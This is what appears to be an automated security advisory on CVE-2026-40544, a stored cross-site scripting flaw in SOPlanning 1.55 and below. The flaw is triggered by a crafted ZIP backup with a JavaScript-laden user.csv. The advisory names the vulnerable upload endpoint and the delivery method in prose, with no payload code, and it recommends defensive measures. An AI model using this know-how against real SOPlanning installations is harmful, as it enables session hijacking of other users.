PatchSiren cyber security CVE debrief

CVE-2026-40544 SOPlanning CVE debrief

An authenticated stored cross-site scripting (XSS) vulnerability exists in SOPlanning versions 1.55 and below. The attack vector is the /process/upload_backup endpoint, where an authenticated attacker with backup functionality access can upload a crafted ZIP archive containing a malicious user.csv file with embedded JavaScript. The injected code executes in a victim's browser when a user clicks the Edit button for the malicious backup. The CVSS 4.0 vector indicates network attack vector, low attack complexity, no attack prerequisites, low privileges required, and user interaction present, with low impacts on confidentiality and integrity of the vulnerable system and low impacts on confidentiality and integrity of subsequent systems. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The vendor attribution is based on reference domain candidate evidence pointing to Soplanning, with low confidence and review needed. No known exploitation in ransomware campaigns has been reported, and the vulnerability is not listed in CISA KEV.

Vendor: SOPlanning
Product: Unknown
CVSS: MEDIUM 5.1
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-06-01
Original CVE updated: 2026-06-01
Advisory published: 2026-06-01
Advisory updated: 2026-06-01

Who should care

SOPlanning administrators and users responsible for backup management, security teams monitoring web application vulnerabilities, and organizations using SOPlanning for project planning who need to assess exposure to authenticated XSS attacks through backup functionality.

Technical summary

The /process/upload_backup endpoint in SOPlanning 1.55 and below fails to properly sanitize user.csv contents extracted from uploaded ZIP backup archives. An authenticated attacker can embed JavaScript payloads in the CSV file. When a victim later clicks the Edit button for the malicious backup entry, the unsanitized CSV data is rendered in the browser context, executing the injected script. The vulnerability requires low-privileged authenticated access and user interaction from the victim.

Defensive priority

medium

Recommended defensive actions

Restrict access to the backup upload functionality to only highly trusted administrative accounts until patching is complete.
Implement strict input validation and output encoding for data extracted from uploaded backup archives, particularly CSV file contents.
Apply Content Security Policy (CSP) headers to mitigate impact of any injected scripts.
Upgrade to a patched version of SOPlanning when available from the vendor.
Monitor for suspicious ZIP archive uploads to the /process/upload_backup endpoint, especially those containing user.csv files with anomalous content.
Review and sanitize any existing backups that may have been uploaded from untrusted sources.

Evidence notes

Vulnerability description sourced from official CVE record and NVD entry. CVSS 4.0 vector and CWE-79 classification provided by [email protected] via NVD references. Vendor attribution derived from reference domain candidate 'Soplanning' with low confidence flag. Affected version range (1.55 and below) stated in CVE description. Attack requires authenticated access to backup functionality.

Official resources

public